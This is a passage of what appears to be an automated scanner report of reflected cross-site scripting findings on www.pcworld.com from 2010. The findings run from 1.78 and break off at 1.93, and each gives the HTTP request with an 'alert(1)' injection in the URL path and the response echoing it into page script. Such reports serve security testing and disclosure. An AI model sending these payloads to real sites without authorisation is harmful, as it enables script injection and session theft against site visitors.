This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/software_services/productivity.html163f6'-alert(1)-'691e9d237e8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C18240BF47B5DA38EBC8F53F380D6C16; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:22 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/software_services/productivity.html163f6'-alert(1)-'691e9d237e8';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.78. http://www.pcworld.com/howto.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/howto.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c734'-alert(1)-'d366475ff4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /howto.html2c734'-alert(1)-'d366475ff4f HTTP/1.1
Accept: */*
Referer: http://www.pcworld.com/reviews.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC1B2D79329169F915FFB0E63668B26; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
bject();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/howto.html2c734'-alert(1)-'d366475ff4f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.79. http://www.pcworld.com/news.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/news.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a73df'-alert(1)-'11714e371a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news.htmla73df'-alert(1)-'11714e371a2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D7C0E98EEA1A2EEACD3BB4DA31B2B2E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/news.htmla73df'-alert(1)-'11714e371a2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.80. http://www.pcworld.com/newsletters/index [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/newsletters/index

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97226'-alert(1)-'106c5ce0535 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /newsletters/index97226'-alert(1)-'106c5ce0535 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44604C0DF7C9A5A3207C228BC5512D40; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:38 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
;
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/newsletters/index97226'-alert(1)-'106c5ce0535';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.81. http://www.pcworld.com/register [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/register

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f34be'-alert(1)-'2ad0e3108ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /registerf34be'-alert(1)-'2ad0e3108ed HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A8EA4075B802BF0797D936C6BFF79782; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:04 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/registerf34be'-alert(1)-'2ad0e3108ed';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.82. http://www.pcworld.com/resource/circ_subservices.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/circ_subservices.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4447f'-alert(1)-'1b60d5542b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/circ_subservices.html4447f'-alert(1)-'1b60d5542b0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:47 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:46 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/circ_subservices.html4447f'-alert(1)-'1b60d5542b0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.83. http://www.pcworld.com/resource/community.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/community.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db99a'-alert(1)-'87c031c31ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/community.htmldb99a'-alert(1)-'87c031c31ef HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:37 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=36AAD9E825CE39060DC21821850E26F3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:37 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
gon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/community.htmldb99a'-alert(1)-'87c031c31ef';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.84. http://www.pcworld.com/resource/contactus.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/contactus.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b438'-alert(1)-'74a2100139 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/contactus.html1b438'-alert(1)-'74a2100139 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:47 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:47 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
gon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/contactus.html1b438'-alert(1)-'74a2100139';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.85. http://www.pcworld.com/resource/idg_intl.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/idg_intl.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 301a2'-alert(1)-'134a1de0d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/idg_intl.html301a2'-alert(1)-'134a1de0d5e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:45 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:44 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/idg_intl.html301a2'-alert(1)-'134a1de0d5e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.86. http://www.pcworld.com/resource/privacy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebc0a'-alert(1)-'f10a965e835 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/privacy.htmlebc0a'-alert(1)-'f10a965e835 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:28 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=062610B67A0667ECB11F0AE6D0BC868B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:28 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/privacy.htmlebc0a'-alert(1)-'f10a965e835';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.87. http://www.pcworld.com/resource/rss.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/rss.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e602'-alert(1)-'2a353c7019e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/6e602'-alert(1)-'2a353c7019e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:38 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B5E652ED74ADE2EC5310961D14B7F6C8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:38 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/6e602'-alert(1)-'2a353c7019e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.88. http://www.pcworld.com/resource/site_faq.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/site_faq.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9554b'-alert(1)-'4097796520d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/site_faq.html9554b'-alert(1)-'4097796520d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:54:42 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2A7BE37C827B82A78784C692E9D1612A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:41 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/site_faq.html9554b'-alert(1)-'4097796520d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.89. http://www.pcworld.com/resource/termsofservice.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/resource/termsofservice.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9ee4'-alert(1)-'4120e7a2cc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resource/termsofservice.htmlf9ee4'-alert(1)-'4120e7a2cc3 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:53:57 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:57 GMT
Connection: close
Vary: Accept-Encoding

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...
serEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/resource/termsofservice.htmlf9ee4'-alert(1)-'4120e7a2cc3';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.90. http://www.pcworld.com/reviews.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21542'-alert(1)-'7ef1cbf5b68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews.html21542'-alert(1)-'7ef1cbf5b68 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.pcworld.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ect();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews.html21542'-alert(1)-'7ef1cbf5b68';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.91. http://www.pcworld.com/reviews/collection/1597/free_antivirus_software.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1597/free_antivirus_software.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de20'-alert(1)-'4b4ee45e9b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1597/free_antivirus_software.html6de20'-alert(1)-'4b4ee45e9b0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1597/free_antivirus_software.html6de20'-alert(1)-'4b4ee45e9b0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.92. http://www.pcworld.com/reviews/collection/1600/top_hd_pocket_camcorders.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1600/top_hd_pocket_camcorders.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9941f'-alert(1)-'9f0262078a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1600/top_hd_pocket_camcorders.html9941f'-alert(1)-'9f0262078a8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8AFD0C136155BDFD46898090A9D77AB7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1600/top_hd_pocket_camcorders.html9941f'-alert(1)-'9f0262078a8';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.93. http://www.pcworld.com/reviews/collection/1602/top_10_digital_slr_cameras.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1602/top_10_digital_slr_cameras.html

Issue detail

